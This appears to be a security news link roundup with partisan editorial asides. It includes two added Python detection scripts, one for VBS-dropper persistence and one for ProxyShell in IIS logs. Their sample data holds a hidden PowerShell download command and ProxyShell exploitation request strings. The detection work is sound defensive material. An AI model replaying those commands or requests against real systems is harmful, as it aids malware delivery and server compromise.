How to Test Your Browser’s Security
As your personal gateway to the internet, your web browser is the first line of defense against malicious websites. If your internet browser is not secure, viruses and spyware can infect your computer and damage your important data.
And while a good antivirus does help, it’s always better to prevent the entry of malware in the first place rather than try to fix the damage. But what exactly can you do about it? Is there any way to check your browser for any security vulnerabilities?
Checkmarx Finds Malicious Open Source PyPi Repository [Ed: If you download malware, it will do malicious things; a lot of these issues boil down to Microsoft shipping malware]
Checkmarx, a provider of an application security testing platform, this week disclosed that it has discovered a malicious package on PyPI, the Python package repository, that has been downloaded more than 70,000 times.
60% of BYOD companies face serious security risks
When employees began bringing shiny, new smartphones into the office in the late 2000s, many business and IT leaders spotted an opportunity. They recognized the productivity-boosting potential of mobile-connected workers, and – since almost everyone had their own smartphones – hoped this digital transformation would come at a big discount for the CFO.
PS4/PS5 security: hacker TheFloW gets another $10'000 bounty from PlayStation. Why we think it matters - Wololo.net
A few days ago, PlayStation’s account on HackerOne displayed a new awarded bounty, once again to hacker extraordinaire TheFloW, and once again for one of the top amounts in that bounty program: $10’000. The news is doing the rounds on hacking scene websites.
It’s the second bounty awarded to TheFloW by PlayStation in less than two weeks, and for an amount that points to a critical security flaw in either the PS4, the PS5, or both. Two weeks ago, the hacker had been awarded $20’000 for another vulnerability disclosure.
6 Best Fixes for Microsoft Word Not Working on Mac [Ed: Proprietary software always prevents you getting a decent experience because upselling (other platform, new version etc.) is the perpetual objective]
Serious Vulnerabilities Found in AWS's Log4Shell Hot Patches
Hot patches made available by Amazon Web Services (AWS) in response to the recent Log4j vulnerabilities could be exploited for privilege escalation or to escape containers, according to Palo Alto Networks.
CyRC Vulnerability Analysis: CVE-2022-1271 in gzip, but it’s not as bad as it sounds [Ed: Microsoft Black Duck focusing on minor flaws in GNU instead of back doors in Microsoft's stuff]
CVE-2022-1271 is a new vulnerability affecting gzip, a widely used open source component for archiving, compressing, and decompressing files.
Featured and Established Publisher badges are now listed on the Chrome Web Store
If you have visited the Chrome Web Store recently, you may have noticed that many extensions show up with a featured and established publisher badge on the Store.
Judge dismisses Microsoft's challenges: ValueLicensing case to proceed in Britain
The ValueLicensing case against Microsoft is set to proceed in the UK after a judge dismissed the Windows vendor's jurisdictional challenge and strike-out application.
Microsoft had hoped to have its UK arm struck off from the claim and suggested that Ireland would be a better place for the claim to be heard, particularly if the company was successful in getting its UK offshoot removed.
Mr Justice Picken disagreed and dismissed Microsoft's challenges, meaning that the damages claim (and Microsoft's defense) will be heard in the High Court in England and Wales.
Google issues third emergency fix for Chrome this year
Google is issuing fixes for two vulnerabilities in its Chrome web browser, including one flaw that is already being exploited in the wild.
The emergency updates the company issued this week impact the almost three billion users of its Chrome browser as well as those using other Chromium-based browsers, such as Microsoft Edge, Brave and Vivaldi.
It is the third such emergency update Google has had to issue for Chrome this year.
Russian accused of running marketplace of stolen logins • The Register
"The cyber-criminal marketplace operated by Dekhtyarchuk promoted and facilitated the sale of compromised credentials, personally identifiable information (PII), and other sensitive financial information," FBI Houston Special Agent in Charge Jim Smith said in a statement. "Cyber-criminal actors behind these marketplaces go to great length to obfuscate their true identities and often utilize other sophisticated methods to further anonymize their activities."
Atlassian comes clean on what data-deleting script behind outage actually did [Ed: Clown computing does not mean reliability; it means data loss and loss of control over your systems' integrity and data]
Atlassian has published an account of what went wrong at the company to make the data of 400 customers vanish in a puff of cloudy vapor. And goodness, it makes for knuckle-chewing reading.
The restoration of customer data is still ongoing.
Atlassian CTO Sri Viswanath wrote that approximately 45 per cent of those afflicted had had service restored but repeated the fortnight estimate it gave earlier this week for undoing the damage to the rest of the affected customers. As of the time of writing, the figure of customers with restored data had risen to 49 per cent.
ESET uncovers vulnerabilities in Lenovo laptops
Got a Lenovo laptop? You might need to do a swift bit of patching judging by the latest set of vulnerabilities uncovered by security researchers at ESET.
Three vulnerabilities were reported today: CVE-2021-3970, CVE-2021-3971, and CVE-2021-3972. The latter two are particularly embarrassing since they are related to UEFI firmware drivers used in the manufacturing process and can be used to disable SPI flash protections or the UEFI Secure Boot feature.
Russian-linked Shuckworm crew ramps up Ukraine attacks [Ed: Microsoft Windows TCO]
The four observed variants of the custom Pterodo malware – which is also known as Pteranodon – all use Visual Basic Script (VBS) droppers with similar functions. They drop a VBScript file, use Scheduled Tasks (schtasks.exe) to ensure persistence, and download code from a C2 server.
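The chain above (script host runs a dropped .vbs, the script registers itself with schtasks.exe, then fetches more code from a C2) is what a detection engineer would look for in process-creation telemetry. The following is an added example of that detection logic, not code from Symantec, The Register or the Pterodo report; the event records are constructed to resemble Sysmon ProcessCreate fields, and every host name, path, task name and address in them is made up (192.0.2.10 is a documentation address).

```python
"""Detect the VBS-dropper -> schtasks persistence -> downloader chain in
constructed process-creation events. Added example; not code from Symantec,
The Register or the Pterodo report. Hosts, paths and addresses are invented."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    # Field names loosely mirror Sysmon Event ID 1 (ProcessCreate).
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"powershell.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe", "curl.exe"}
# Locations a phishing dropper usually writes to (an assumption for this example).
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|temp)\\", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_vbs_host_launch(ev):
    """wscript/cscript started with a .vbs on its command line."""
    return basename(ev.image) in SCRIPT_HOSTS and ".vbs" in ev.cmdline.lower()


def schtasks_task_action(ev):
    """Return the /tr (task run) argument of a 'schtasks /create' command, else None."""
    if basename(ev.image) != "schtasks.exe":
        return None
    if not re.search(r"(?i)(^|\s)/create(\s|$)", ev.cmdline):
        return None
    m = re.search(r'(?i)/tr\s+(?:"([^"]*)"|(\S+))', ev.cmdline)
    return (m.group(1) or m.group(2)) if m else None


def detect_vbs_persistence(events):
    """Flag schtasks /create whose action launches a .vbs or a script host.
    Severity is 'high' when the schtasks parent is itself a script host running
    a .vbs (the dropper registering its own persistence) and the script sits in
    a user-writable directory; otherwise 'medium' for an analyst to triage."""
    by_pid = {(e.host, e.pid): e for e in events}
    findings = []
    for ev in events:
        action = schtasks_task_action(ev)
        if action is None:
            continue
        a = action.lower()
        if ".vbs" not in a and not any(h in a for h in SCRIPT_HOSTS):
            continue
        parent = by_pid.get((ev.host, ev.ppid))
        chained = parent is not None and is_vbs_host_launch(parent)
        staged = USER_WRITABLE.search(a) is not None
        findings.append({
            "host": ev.host, "pid": ev.pid, "task_action": action,
            "parent_is_vbs": chained,
            "severity": "high" if chained and staged else "medium",
        })
    return findings


def detect_vbs_download(events):
    """Flag a script host running a .vbs that spawns a known downloader with a URL."""
    by_pid = {(e.host, e.pid): e for e in events}
    findings = []
    for ev in events:
        parent = by_pid.get((ev.host, ev.ppid))
        if parent is None or not is_vbs_host_launch(parent):
            continue
        if basename(ev.image) not in DOWNLOADERS:
            continue
        m = URL_RE.search(ev.cmdline)
        findings.append({"host": ev.host, "pid": ev.pid,
                         "downloader": basename(ev.image),
                         "url": m.group(0) if m else None})
    return findings


# Constructed sample: one dropper chain on WS01, one benign admin task on WS02.
SAMPLE_EVENTS = [
    ProcEvent("WS01", 4100, 980, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("WS01", 4212, 4100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\olena\AppData\Roaming\document.vbs"'),
    ProcEvent("WS01", 4230, 4212, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /f /sc minute /mo 11 /tn "Update" '
              r'/tr "wscript.exe //b C:\Users\olena\AppData\Roaming\document.vbs"'),
    ProcEvent("WS01", 4251, 4212, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadString('http://192.0.2.10/p.vbs')\""),
    ProcEvent("WS02", 5100, 900, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent("WS02", 5120, 5100, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'),
]

if __name__ == "__main__":
    for finding in detect_vbs_persistence(SAMPLE_EVENTS) + detect_vbs_download(SAMPLE_EVENTS):
        print(finding)
```

The two detectors are kept separate on purpose: a scheduled task pointing at a script in AppData is worth a ticket even when the dropper's own download attempt was blocked, and a script host spawning a downloader is worth one even when persistence was set up by some other means.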
Machine-learning models vulnerable to undetectable backdoors • The Register
Boffins from UC Berkeley, MIT, and the Institute for Advanced Study in the United States have devised techniques to implant undetectable backdoors in machine learning (ML) models.
Their work suggests ML models developed by third parties fundamentally cannot be trusted.
In a paper that's currently being reviewed – "Planting Undetectable Backdoors in Machine Learning Models" – Shafi Goldwasser, Michael Kim, Vinod Vaikuntanathan, and Or Zamir explain how a malicious individual creating a machine learning classifier – an algorithm that classifies data into categories (eg "spam" or "not spam") – can subvert the classifier in a way that's not evident.
Brave, DuckDuckGo to unplug Google's AMP where possible
Brave, the browser maker, and DuckDuckGo, the web search service, have both taken aim at AMP, Google's controversial web publishing framework.
Brave on Tuesday introduced a feature called De-AMP that lets those using the Brave browser avoid Google-hosted AMP pages and go straight to publisher content on standard web pages.
Funky Pigeon pauses all orders after 'security incident' • The Register
WH Smith told us: "We have also informed the relevant regulators and law enforcement authorities, and we will continue to review and update our protocols based on what we learn from this incident.
Google tracked 58 exploited zero-day security holes in 2021 • The Register
More entities are reporting in-the-wild zero-day exploitation, she wrote, adding that this is a "very rough measure." Along these same lines, more vendors are noticing exploited-in-the-wild zero-day flaws in their own products. Google, as an example, discovered seven of these in its own products last year and Microsoft discovered 10, Stone wrote.
Bad password check lets anyone log into Cisco WLAN controls • The Register
The advisory refers to the vulnerability as CVE-2022-20695 and notes that if the flaw is successfully exploited, the attacker can gain administrator privileges. Cisco has bestowed the vulnerability with a severity rating of 10.0 out of 10.0. That's as bad as it gets for those whose rating scale does not go to 11.0, otherwise known as "the call is coming from inside the house!"
US warns North Korean Lazarus gang rising against cryptocurrency outfits
"The term TraderTraitor describes a series of malicious applications written using cross-platform JavaScript code with the Node.js runtime environment using the Electron framework," the agencies warn.
Criminals adopting new methods to bypass improved defenses, says Zscaler
Current events – such as the COVID-19 pandemic and the rising popularity of cryptocurrency – continue to work as lures to convince victims to click on a malicious link. The shift to more remote work has also added to the threat level of phishing. Employees no longer have the same security at home that they may have had in the office. VPNs and collaboration applications were used as themes in phishing campaigns, Desai said.
REvil resurrected? Ransomware crew appears to be back. Keyword: Appears [Ed: Microsoft Windows TCO]
REvil, aka Sodinokibi, has been one of the most active — and lucrative — ransomware gangs in history. Its victims range from US nuclear weapons contractors to MSPs such as Kaseya to British VOIP providers.
macOS Server discontinued after years on life support
Apple is finally killing off the venerable macOS Server, directing users still clinging to Profile Manager toward Mobile Device Management solutions.
The move is arguably long overdue. Much of what made macOS Server a server was deprecated in 2018 as the company announced plans to stop the likes of DHCP and DNS in its product and directed users to handy open-source alternatives.
Apple Open Directory and Profile Manager lingered on, with the latter being used for configuration management for Apple devices in an organization. Now, however, that last stub of functionality is deemed obsolete and Apple has warned that while many bits of macOS Server will live on in macOS, Profile Manager will not. So the time for dodging Mobile Device Management (MDM) is up.
So, what happened with GitHub, Heroku, and those raided private repos?
GitHub says it has identified and alerted developers who have had their private repositories accessed and downloaded via stolen authentication tokens.
In this multifaceted fiasco, Microsoft-owned GitHub insisted its security was not breached. Instead, we're told, "compromised OAuth user tokens from Heroku and Travis-CI-maintained OAuth applications were stolen and abused to download private repositories belonging to dozens of victim organizations that were using these apps."
Google bans third-party call-recording apps from Play Store
Google has made changes to its Play Store policies, effectively banning third-party call-recording apps from May 11; the company says it wants to stop the accessibility APIs being used for anything other than accessibility.
Google has for some time blocked true call recording (since Android 6) and recording through the microphone (since Android 10). Developers have been using the accessibility APIs as a workaround to record calls on Android.
Microsoft Exchange servers hacked to deploy Hive ransomware [Ed: Microsoft Windows TCO]
A Hive ransomware affiliate has been targeting Microsoft Exchange servers vulnerable to ProxyShell security issues to deploy various backdoors, including Cobalt Strike beacon.
HHS HC3 Warns Healthcare Sector of Hive Threats [Ed: Microsoft Windows TCO]
Federal authorities are warning the healthcare and public health sectors of aggressive, financially motivated attacks by the Hive ransomware group, which has been
Hive ransomware affiliate zeros in on Exchange servers - The Register [Ed: Microsoft Windows TCO]
An affiliate of the aggressive Hive ransomware group is exploiting known vulnerabilities in Microsoft Exchange servers to encrypt and exfiltrate data and threaten to publicly disclose the information if the ransom isn't paid.
In a recent attack on an unnamed organization, the Hive affiliate rapidly compromised multiple devices and file servers by exploiting the ProxyShell vulnerabilities in Exchange servers, encrypting the data within 72 hours of the start of the attack, threat hunters with data security vendor Varonis Systems said in a report this week.
The attack included all the hallmarks of one associated with Hive, a ransomware-as-a-service (RaaS) group that emerged in June 2021 and has targeted a range of sectors, including healthcare, retail, nonprofits, and energy providers.
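The entry vector in the Varonis case, ProxyShell against the Exchange front end, leaves a recognisable trace in the IIS logs, and checking those logs is the first thing a responder would do after reading the item above. The script below is an added example of that check, not code from Varonis, The Register or Microsoft. The request shape it looks for (an /autodiscover/autodiscover.json request whose query string begins with "@<domain>/" followed by a backend path such as /mapi/nspi or /powershell, with an Email= value that repeats the autodiscover.json path) follows the public ProxyShell write-ups; the log lines, server name, user names and addresses are constructed (198.51.100.7 is a documentation address, evil.corp a placeholder).

```python
"""Scan IIS W3C logs for ProxyShell stage-one (Autodiscover explicit-logon
path confusion) requests. Added example, not code from Varonis, The Register
or Microsoft. Request shape follows public ProxyShell analyses; the log lines
below are constructed."""
from urllib.parse import unquote

# Backend paths the front end should never be asked to reach through an
# explicit-logon Autodiscover URL (assumption: those named in public analyses).
BACKEND_MARKERS = ("/mapi/nspi", "/powershell", "/ews/")


def parse_iis_w3c(text):
    """Yield one dict per log row, keyed by the names in the '#Fields:' header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")          # IIS replaces spaces inside fields with '+'
        if len(values) != len(fields):
            continue                      # malformed row: skip rather than misalign columns
        yield dict(zip(fields, values))


def proxyshell_reason(rec):
    """Return a reason string if the row looks like ProxyShell stage one, else None."""
    stem = rec.get("cs-uri-stem", "").lower()
    query = unquote(rec.get("cs-uri-query", "")).lower()
    if "/autodiscover/autodiscover.json" not in stem or not query.startswith("@"):
        return None
    routed_path = query.split("?", 1)[0]   # e.g. '@evil.corp/mapi/nspi/'
    backend = next((m for m in BACKEND_MARKERS if m in routed_path), None)
    echoed = "email=autodiscover/autodiscover.json?@" in query
    if backend is None and not echoed:
        return None
    reason = f"explicit-logon path confusion -> {backend or 'unrecognised backend'}"
    if echoed:
        reason += " (Email= echoes autodiscover.json)"
    return reason


def find_proxyshell(log_text):
    """Return the suspicious rows with the fields a responder needs first."""
    hits = []
    for rec in parse_iis_w3c(log_text):
        reason = proxyshell_reason(rec)
        if reason:
            hits.append({"time": f'{rec["date"]} {rec["time"]}',
                         "c_ip": rec["c-ip"], "method": rec["cs-method"],
                         "uri": rec["cs-uri-stem"] + "?" + rec["cs-uri-query"],
                         "reason": reason})
    return hits


# Constructed sample log: two exploitation requests from one client, then
# legitimate Autodiscover (XML and JSON v1.0) and OWA traffic that must not match.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-04-18 02:13:11 10.0.0.5 GET /autodiscover/autodiscover.json @evil.corp/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 198.51.100.7 python-requests/2.27.1 200
2022-04-18 02:13:12 10.0.0.5 POST /autodiscover/autodiscover.json @evil.corp/powershell/?&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 198.51.100.7 python-requests/2.27.1 200
2022-04-18 02:14:03 10.0.0.5 POST /autodiscover/autodiscover.xml - 443 CORP\alice 10.0.1.22 Microsoft+Office/16.0 200
2022-04-18 02:14:05 10.0.0.5 GET /autodiscover/autodiscover.json/v1.0/bob@corp.example Protocol=ActiveSync 443 - 10.0.1.30 Outlook-iOS/2.0 200
2022-04-18 02:14:09 10.0.0.5 GET /owa/ - 443 - 10.0.1.22 Mozilla/5.0 200
"""

if __name__ == "__main__":
    for hit in find_proxyshell(SAMPLE_LOG):
        print(hit)
```

Note the fourth sample row: the JSON Autodiscover v1.0 endpoint legitimately carries an "@" in the path, so matching on "autodiscover.json" plus "@" alone would page on every mobile client. Requiring the query string itself to begin with "@" and to route to a backend path keeps the check to the path-confusion shape.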
UK Prime Minister, Catalan groups 'targeted by NSO Pegasus spyware'
Citizen Lab has reported finding suspected surveillance software on devices associated with both the UK Prime Minister's Office and what was formerly called the British Foreign and Commonwealth Office.
The Canadian research outfit also said it had identified at least 65 individuals linked with Catalan civil society groups in Spain who were targeted by, or infected with, surveillance software. Catalonia is an autonomous region within Spain where there's an ongoing politically divisive fight for national independence.
Microsoft vs The Web, Digital Restrictions (DRM) Stories
today's howtos
Barry Kauler on EasyOS and OpenEmbedded
GNU Parallel 20220422 ('Буча') released
GNU Parallel 20220422 ('Буча') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

  Immensely useful which I am forever grateful that it exists.
    -- AlexDragusin@ycombinator

New in this release:

* sash is no longer supported as shell.
* --retries 0 is an alias for --retries 2147483647.
* --shell-completion returns shell completion code.
* --ssh-login-file reloads every second.
* --parset is replaced with --_parset because it is only used internally.
* sem --pipe passes STDIN (standard input) to the command.
* Bug fixes and man page updates.

Get the book: GNU Parallel 2018 http://www.lulu.com/shop/ole-tange/gnu-parallel-2018/paperback/product-23558902.html

GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
